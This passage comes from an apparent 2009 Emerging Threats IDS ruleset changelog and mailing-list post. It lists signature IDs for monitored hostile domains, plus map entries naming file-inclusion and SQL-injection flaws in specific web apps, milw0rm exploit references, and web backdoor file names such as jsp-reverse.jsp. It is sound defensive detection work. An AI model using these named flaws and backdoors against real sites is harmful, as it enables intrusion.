(emerging-rbn.rules) 2406223 - ET RBN Known Russian Business Network Monitored Domains (224) (emerging-rbn.rules) 2406224 - ET RBN Known Russian Business Network Monitored Domains (225) (emerging-rbn.rules) 2406225 - ET RBN Known Russian Business Network Monitored Domains (226) (emerging-rbn.rules) 2406226 - ET RBN Known Russian Business Network Monitored Domains (227) (emerging-rbn.rules) 2406227 - ET RBN Known Russian Business Network Monitored Domains (228) (emerging-rbn.rules) 2406228 - ET RBN Known Russian Business Network Monitored Domains (229) (emerging-rbn.rules) 2406229 - ET RBN Known Russian Business Network Monitored Domains (230) (emerging-rbn.rules) 2406230 - ET RBN Known Russian Business Network Monitored Domains (231) (emerging-rbn.rules) 2406231 - ET RBN Known Russian Business Network Monitored Domains (232) (emerging-rbn.rules) 2406232 - ET RBN Known Russian Business Network Monitored Domains (233) (emerging-rbn.rules) 2406233 - ET RBN Known Russian Business Network Monitored Domains (234) (emerging-rbn.rules) 2406234 - ET RBN Known Russian Business Network Monitored Domains (235) (emerging-rbn.rules) 2406235 - ET RBN Known Russian Business Network Monitored Domains (236) (emerging-rbn.rules) 2406236 - ET RBN Known Russian Business Network Monitored Domains (237) (emerging-rbn.rules) 2406237 - ET RBN Known Russian Business Network Monitored Domains (238) (emerging-rbn.rules) 2406238 - ET RBN Known Russian Business Network Monitored Domains (239) (emerging-rbn.rules) 2406239 - ET RBN Known Russian Business Network Monitored Domains (240) (emerging-rbn.rules) 2406240 - ET RBN Known Russian Business Network Monitored Domains (241) (emerging-rbn.rules) 2406241 - ET RBN Known Russian Business Network Monitored Domains (242) (emerging-rbn.rules) 2406242 - ET RBN Known Russian Business Network Monitored Domains (243) (emerging-rbn.rules) 2406243 - ET RBN Known Russian Business Network Monitored Domains (244) (emerging-rbn.rules) 2406244 - ET RBN Known 
Russian Business Network Monitored Domains (245) (emerging-rbn.rules) 2406245 - ET RBN Known Russian Business Network Monitored Domains (246) (emerging-rbn.rules) 2406246 - ET RBN Known Russian Business Network Monitored Domains (247) (emerging-rbn.rules) 2406247 - ET RBN Known Russian Business Network Monitored Domains (248) (emerging-rbn.rules) 2406248 - ET RBN Known Russian Business Network Monitored Domains (249) (emerging-rbn.rules) 2406249 - ET RBN Known Russian Business Network Monitored Domains (250) (emerging-rbn.rules) 2406250 - ET RBN Known Russian Business Network Monitored Domains (251) (emerging-rbn.rules) 2406251 - ET RBN Known Russian Business Network Monitored Domains (252) (emerging-rbn.rules) 2406252 - ET RBN Known Russian Business Network Monitored Domains (253) (emerging-rbn.rules) 2406253 - ET RBN Known Russian Business Network Monitored Domains (254) (emerging-rbn.rules) 2406254 - ET RBN Known Russian Business Network Monitored Domains (255) (emerging-rbn.rules) 2406255 - ET RBN Known Russian Business Network Monitored Domains (256) (emerging-rbn.rules) 2406256 - ET RBN Known Russian Business Network Monitored Domains (257) (emerging-rbn.rules) 2406257 - ET RBN Known Russian Business Network Monitored Domains (258) (emerging-rbn.rules) 2406258 - ET RBN Known Russian Business Network Monitored Domains (259) (emerging-rbn.rules) 2406259 - ET RBN Known Russian Business Network Monitored Domains (260) (emerging-rbn.rules) 2406260 - ET RBN Known Russian Business Network Monitored Domains (261) (emerging-rbn.rules) 2406261 - ET RBN Known Russian Business Network Monitored Domains (262) (emerging-rbn.rules) 2406262 - ET RBN Known Russian Business Network Monitored Domains (263) (emerging-rbn.rules) 2406263 - ET RBN Known Russian Business Network Monitored Domains (264) (emerging-rbn.rules) 2406264 - ET RBN Known Russian Business Network Monitored Domains (265) (emerging-rbn.rules) 2406265 - ET RBN Known Russian Business Network Monitored Domains 
(266) (emerging-rbn.rules) 2406266 - ET RBN Known Russian Business Network Monitored Domains (267) (emerging-rbn.rules) 2406267 - ET RBN Known Russian Business Network Monitored Domains (268) (emerging-rbn.rules) 2406268 - ET RBN Known Russian Business Network Monitored Domains (269) (emerging-rbn.rules) 2406269 - ET RBN Known Russian Business Network Monitored Domains (270) (emerging-rbn.rules) 2406270 - ET RBN Known Russian Business Network Monitored Domains (271) (emerging-rbn.rules) 2406271 - ET RBN Known Russian Business Network Monitored Domains (272) (emerging-rbn.rules) 2406272 - ET RBN Known Russian Business Network Monitored Domains (273) (emerging-rbn.rules) 2406273 - ET RBN Known Russian Business Network Monitored Domains (274) (emerging-rbn.rules) 2406274 - ET RBN Known Russian Business Network Monitored Domains (275) (emerging-rbn.rules) 2406275 - ET RBN Known Russian Business Network Monitored Domains (276) (emerging-rbn.rules) 2406276 - ET RBN Known Russian Business Network Monitored Domains (277) (emerging-rbn.rules) 2406277 - ET RBN Known Russian Business Network Monitored Domains (278) (emerging-rbn.rules) 2406278 - ET RBN Known Russian Business Network Monitored Domains (279) (emerging-rbn.rules) 2406279 - ET RBN Known Russian Business Network Monitored Domains (280) (emerging-rbn.rules) 2406280 - ET RBN Known Russian Business Network Monitored Domains (281) (emerging-rbn.rules) 2406281 - ET RBN Known Russian Business Network Monitored Domains (282) (emerging-rbn.rules) 2406282 - ET RBN Known Russian Business Network Monitored Domains (283) (emerging-rbn.rules) 2406283 - ET RBN Known Russian Business Network Monitored Domains (284) (emerging-rbn.rules) 2406284 - ET RBN Known Russian Business Network Monitored Domains (285) (emerging-rbn.rules) 2407000 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (1) (emerging-rbn-BLOCK.rules) 2407001 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (2) 
(emerging-rbn-BLOCK.rules) 2407002 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (3) (emerging-rbn-BLOCK.rules) 2407003 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (4) (emerging-rbn-BLOCK.rules) 2407004 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (5) (emerging-rbn-BLOCK.rules) 2407005 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (6) (emerging-rbn-BLOCK.rules) 2407006 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (7) (emerging-rbn-BLOCK.rules) 2407007 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (8) (emerging-rbn-BLOCK.rules) 2407008 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (9) (emerging-rbn-BLOCK.rules) 2407009 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (10) (emerging-rbn-BLOCK.rules) 2407010 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (11) (emerging-rbn-BLOCK.rules) 2407011 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (12) (emerging-rbn-BLOCK.rules) 2407012 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (13) (emerging-rbn-BLOCK.rules) 2407013 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (14) (emerging-rbn-BLOCK.rules) 2407014 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (15) (emerging-rbn-BLOCK.rules) 2407015 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (16) (emerging-rbn-BLOCK.rules) 2407016 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (17) (emerging-rbn-BLOCK.rules) 2407017 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (18) (emerging-rbn-BLOCK.rules) 2407018 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (19) (emerging-rbn-BLOCK.rules) 2407019 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (20) (emerging-rbn-BLOCK.rules) 2407020 - ET RBN 
Known Russian Business Network Monitored Domains - BLOCKING (21) (emerging-rbn-BLOCK.rules) 2407021 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (22) (emerging-rbn-BLOCK.rules) 2407022 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (23) (emerging-rbn-BLOCK.rules) 2407023 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (24) (emerging-rbn-BLOCK.rules) 2407024 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (25) (emerging-rbn-BLOCK.rules) 2407025 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (26) (emerging-rbn-BLOCK.rules) 2407026 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (27) (emerging-rbn-BLOCK.rules) 2407027 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (28) (emerging-rbn-BLOCK.rules) 2407028 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (29) (emerging-rbn-BLOCK.rules) 2407029 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) (emerging-rbn-BLOCK.rules) 2407030 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (31) (emerging-rbn-BLOCK.rules) 2407031 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (32) (emerging-rbn-BLOCK.rules) 2407032 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (33) (emerging-rbn-BLOCK.rules) 2407033 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (34) (emerging-rbn-BLOCK.rules) 2407034 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (35) (emerging-rbn-BLOCK.rules) 2407035 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (36) (emerging-rbn-BLOCK.rules) 2407036 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (37) (emerging-rbn-BLOCK.rules) 2407037 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (38) (emerging-rbn-BLOCK.rules) 2407038 - ET RBN Known Russian Business Network 
Monitored Domains - BLOCKING (39) (emerging-rbn-BLOCK.rules) 2407039 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (40) (emerging-rbn-BLOCK.rules) 2407040 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (41) (emerging-rbn-BLOCK.rules) 2407041 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (42) (emerging-rbn-BLOCK.rules) 2407042 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (43) (emerging-rbn-BLOCK.rules) 2407043 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (44) (emerging-rbn-BLOCK.rules) 2407044 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (45) (emerging-rbn-BLOCK.rules) 2407045 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (46) (emerging-rbn-BLOCK.rules) 2407046 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (47) (emerging-rbn-BLOCK.rules) 2407047 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (48) (emerging-rbn-BLOCK.rules) 2407048 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (49) (emerging-rbn-BLOCK.rules) 2407049 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (50) (emerging-rbn-BLOCK.rules) 2407050 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (51) (emerging-rbn-BLOCK.rules) 2407051 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (52) (emerging-rbn-BLOCK.rules) 2407052 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (53) (emerging-rbn-BLOCK.rules) 2407053 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (54) (emerging-rbn-BLOCK.rules) 2407054 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (55) (emerging-rbn-BLOCK.rules) 2407055 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (56) (emerging-rbn-BLOCK.rules) 2407056 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (57) 
(emerging-rbn-BLOCK.rules) 2407057 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (58) (emerging-rbn-BLOCK.rules) 2407058 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (59) (emerging-rbn-BLOCK.rules) 2407059 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (60) (emerging-rbn-BLOCK.rules) 2407060 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (61) (emerging-rbn-BLOCK.rules) 2407061 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (62) (emerging-rbn-BLOCK.rules) 2407062 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (63) (emerging-rbn-BLOCK.rules) 2407063 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (64) (emerging-rbn-BLOCK.rules) 2407064 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (65) (emerging-rbn-BLOCK.rules) 2407065 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (66) (emerging-rbn-BLOCK.rules) 2407066 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (67) (emerging-rbn-BLOCK.rules) 2407067 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (68) (emerging-rbn-BLOCK.rules) 2407068 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (69) (emerging-rbn-BLOCK.rules) 2407069 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (70) (emerging-rbn-BLOCK.rules) 2407070 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (71) (emerging-rbn-BLOCK.rules) 2407071 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (72) (emerging-rbn-BLOCK.rules) 2407072 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (73) (emerging-rbn-BLOCK.rules) 2407073 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (74) (emerging-rbn-BLOCK.rules) 2407074 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (75) (emerging-rbn-BLOCK.rules) 2407075 - 
ET RBN Known Russian Business Network Monitored Domains - BLOCKING (76) (emerging-rbn-BLOCK.rules) 2407076 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (77) (emerging-rbn-BLOCK.rules) 2407077 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (78) (emerging-rbn-BLOCK.rules) 2407078 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (79) (emerging-rbn-BLOCK.rules) 2407079 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (80) (emerging-rbn-BLOCK.rules) 2407080 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (81) (emerging-rbn-BLOCK.rules) 2407081 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (82) (emerging-rbn-BLOCK.rules) 2407082 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (83) (emerging-rbn-BLOCK.rules) 2407083 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (84) (emerging-rbn-BLOCK.rules) 2407084 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (85) (emerging-rbn-BLOCK.rules) 2407085 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (86) (emerging-rbn-BLOCK.rules) 2407086 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (87) (emerging-rbn-BLOCK.rules) 2407087 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (88) (emerging-rbn-BLOCK.rules) 2407088 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (89) (emerging-rbn-BLOCK.rules) 2407089 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (90) (emerging-rbn-BLOCK.rules) 2407090 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (91) (emerging-rbn-BLOCK.rules) 2407091 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (92) (emerging-rbn-BLOCK.rules) 2407092 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (93) (emerging-rbn-BLOCK.rules) 2407093 - ET RBN Known Russian Business Network 
Monitored Domains - BLOCKING (94) (emerging-rbn-BLOCK.rules) 2407094 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (95) (emerging-rbn-BLOCK.rules) 2407095 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (96) (emerging-rbn-BLOCK.rules) 2407096 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (97) (emerging-rbn-BLOCK.rules) 2407097 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (98) (emerging-rbn-BLOCK.rules) 2407098 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (99) (emerging-rbn-BLOCK.rules) 2407099 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (100) (emerging-rbn-BLOCK.rules) 2407100 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (101) (emerging-rbn-BLOCK.rules) 2407101 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (102) (emerging-rbn-BLOCK.rules) 2407102 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (103) (emerging-rbn-BLOCK.rules) 2407103 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (104) (emerging-rbn-BLOCK.rules) 2407104 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (105) (emerging-rbn-BLOCK.rules) 2407105 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (106) (emerging-rbn-BLOCK.rules) 2407106 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (107) (emerging-rbn-BLOCK.rules) 2407107 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (108) (emerging-rbn-BLOCK.rules) 2407108 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (109) (emerging-rbn-BLOCK.rules) 2407109 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (110) (emerging-rbn-BLOCK.rules) 2407110 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (111) (emerging-rbn-BLOCK.rules) 2407111 - ET RBN Known Russian Business Network Monitored Domains - 
BLOCKING (112) (emerging-rbn-BLOCK.rules) 2407112 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (113) (emerging-rbn-BLOCK.rules) 2407113 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (114) (emerging-rbn-BLOCK.rules) 2407114 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (115) (emerging-rbn-BLOCK.rules) 2407115 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (116) (emerging-rbn-BLOCK.rules) 2407116 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (117) (emerging-rbn-BLOCK.rules) 2407117 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (118) (emerging-rbn-BLOCK.rules) 2407118 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (119) (emerging-rbn-BLOCK.rules) 2407119 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (120) (emerging-rbn-BLOCK.rules) 2407120 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (121) (emerging-rbn-BLOCK.rules) 2407121 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (122) (emerging-rbn-BLOCK.rules) 2407122 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (123) (emerging-rbn-BLOCK.rules) 2407123 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (124) (emerging-rbn-BLOCK.rules) 2407124 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (125) (emerging-rbn-BLOCK.rules) 2407125 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (126) (emerging-rbn-BLOCK.rules) 2407126 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (127) (emerging-rbn-BLOCK.rules) 2407127 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (128) (emerging-rbn-BLOCK.rules) 2407128 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (129) (emerging-rbn-BLOCK.rules) 2407129 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (130) 
(emerging-rbn-BLOCK.rules) 2407130 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (131) (emerging-rbn-BLOCK.rules) 2407131 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (132) (emerging-rbn-BLOCK.rules) 2407132 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (133) (emerging-rbn-BLOCK.rules) 2407133 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (134) (emerging-rbn-BLOCK.rules) 2407134 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (135) (emerging-rbn-BLOCK.rules) 2407135 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (136) (emerging-rbn-BLOCK.rules) 2407136 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (137) (emerging-rbn-BLOCK.rules) 2407137 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (138) (emerging-rbn-BLOCK.rules) 2407138 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (139) (emerging-rbn-BLOCK.rules) 2407139 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (140) (emerging-rbn-BLOCK.rules) 2407140 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (141) (emerging-rbn-BLOCK.rules) 2407141 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (142) (emerging-rbn-BLOCK.rules) 2407142 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (143) (emerging-rbn-BLOCK.rules) 2407143 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (144) (emerging-rbn-BLOCK.rules) 2407144 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (145) (emerging-rbn-BLOCK.rules) 2407145 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (146) (emerging-rbn-BLOCK.rules) 2407146 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (147) (emerging-rbn-BLOCK.rules) 2407147 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (148) 
[+++] Added non-rule lines: [+++]

-> Added to emerging-rbn-BLOCK.rules (2):
# VERSION 128
# Updated 2009-05-07 11:32:09

-> Added to emerging-rbn.rules (2):
# VERSION 128
# Updated 2009-05-07 11:32:09

-> Added to emerging-sid-msg.map (45):
2009306 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009307 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009308 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009309 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009310 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009311 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009312 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009313 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009314 || ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete || url,milw0rm.com/exploits/8257 || bugtraq,34200
2009315 || ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite || url,securityfocus.com/archive/1/502319 || url,milw0rm.com/exploits/8332
2009316 || ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion || bugtraq,30686
2009317 || ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
2009318 || ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
2009319 || ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection || url,milw0rm.com/exploits/7722 || bugtraq,33194
2009320 || ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion || url,milw0rm.com/exploits/7978 || bugtraq,33621
2009321 || ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion || url,milw0rm.com/exploits/7978 || bugtraq,33621
2009322 || ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution || url,milw0rm.com/exploits/8160 || bugtraq,34004
2009323 || ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection || url,milw0rm.com/exploits/8124 || bugtraq,33933
2009324 || ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion || url,milw0rm.com/exploits/8124 || bugtraq,33933
2009325 || ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
2009326 || ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
2009327 || ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
2009328 || ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution || url,milw0rm.com/exploits/8206 || bugtraq,34115
2009329 || ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion || bugtraq,33965 || url,milw0rm.com/exploits/8140 || url,secunia.com/advisories/34091/
2009330 || ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion || url,milw0rm.com/exploits/6846 || url,vupen.com/english/advisories/2008/2938
2009331 || ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion || bugtraq,30785 || url,milw0rm.com/exploits/6287
2009332 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
2009333 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
2009334 || ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite || bugtraq,23934 || url,milw0rm.com/exploits/8208
2009335 || ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection || url,xforce.iss.net/xforce/xfdb/46330 || url,milw0rm.com/exploits/6982 || bugtraq,32112
2009336 || ET WEB Possible Web Backdoor cfexec.cfm access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009337 || ET WEB Possible Web Backdoor cmdasp.asp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009338 || ET WEB Possible Web Backdoor cmdasp.aspx access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009339 || ET WEB Possible Web Backdoor simple-backdoor.php access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009340 || ET WEB Possible Web Backdoor php-backdoor.php access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009341 || ET WEB Possible Web Backdoor jsp-reverse.jsp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009342 || ET WEB Possible Web Backdoor perlcmd.cgi access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009343 || ET WEB Possible Web Backdoor cmdjsp.jsp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009344 || ET WEB Possible Web Backdoor cmd-asp-5.1.asp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2500138 || ET COMPROMISED Known Compromised or Hostile Host Traffic (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500140 || ET COMPROMISED Known Compromised or Hostile Host Traffic (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510138 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510140 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

-> Added to emerging-web.rules (1):
#by Jaime Blasco

[---] Removed non-rule lines: [---]

-> Removed from emerging-rbn-BLOCK.rules (2):
# VERSION 127
# Updated 2009-04-29 09:08:59

-> Removed from emerging-rbn.rules (2):
# VERSION 127
# Updated 2009-04-29 09:08:59

From sroddy at ligo-la.caltech.edu Thu May 7 19:46:06 2009
From: sroddy at ligo-la.caltech.edu (Shannon Roddy)
Date: Thu, 07 May 2009 18:46:06 -0500
Subject: [Emerging-Sigs] FPs on 2002035
Message-ID: <4A0372BE.7000509@ligo-la.caltech.edu>

FP on the following rule will happen if you have a user of culturecode.com's "Things" for mac or iphone.
